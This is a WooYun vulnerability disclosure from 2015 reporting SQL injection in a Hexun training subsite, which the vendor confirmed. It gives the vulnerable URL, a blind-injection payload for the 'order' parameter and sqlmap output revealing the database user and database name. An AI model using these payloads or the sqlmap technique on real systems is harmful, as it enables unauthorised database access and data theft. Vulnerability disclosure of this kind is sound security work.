漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-092197
漏洞标题:和讯网另一分站存在SQL注入漏洞(多个参数)
相关厂商:和讯网
漏洞作者: greg.wu
提交时间:2015-01-16 12:51
修复时间:2015-03-02 12:52
公开时间:2015-03-02 12:52
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-01-16: 细节已通知厂商并且等待厂商处理中
2015-01-16: 厂商已经确认,细节仅向厂商公开
2015-01-26: 细节向核心白帽子及相关领域专家公开
2015-02-05: 细节向普通白帽子公开
2015-02-15: 细节向实习白帽子公开
2015-03-02: 细节向公众公开
简要描述:
直接在url参数中传sql语句,对于这种行为,我只能说:逗逼!
详细说明:
注入点:
http://px.hexun.com/ajaxpage/responsepage.aspx?func=GetProductList&condition=%20and%20a.ClassID%20not%20in%20%28select%20classid%20From%20dbo.PXPT_ClassSection%20where%20IsDelete%20=%200%29%20&order=a.goodrate&pageindex=1&pagesize=8&_=1421381414007
很明显的,condition传的就是赤果果的ms sql 语句,前面或者后面加个盲注语句就可以跑数据了
另一个参数,order也存在注入,构造一下payload:order=case when 1=1 * then a.goodrate else 100 end ,星号处放盲注语句就可以跑数据了
漏洞证明:
sqlmap跑个用户当前库看看
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://px.hexun.com:80/ajaxpage/responsepage.aspx?func=GetProductList&condition= and a.ClassID not in (select classid From dbo.PXPT_ClassSection where IsDelete = 0) AND 9023=9023&order=a.goodrate&pageindex=1&pagesize=8&_=1421381414007
---
[04:24:51] [INFO] testing Microsoft SQL Server
[04:24:51] [INFO] confirming Microsoft SQL Server
[04:24:53] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 4.0.30319, Nginx
back-end DBMS: Microsoft SQL Server 2005
[04:24:53] [INFO] fetching current user
[04:24:53] [INFO] resumed: vipuser
current user: 'vipuser'
[04:24:53] [INFO] fetching current database
[04:24:53] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[04:24:53] [INFO] retrieved:
[04:24:55] [WARNING] reflective value(s) found and filtering out
DB_APP
current database: 'DB_APP'
修复方案:
你更懂
版权声明:转载请注明来源 greg.wu@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2015-01-16 12:52
厂商回复:
处理中
最新状态:
暂无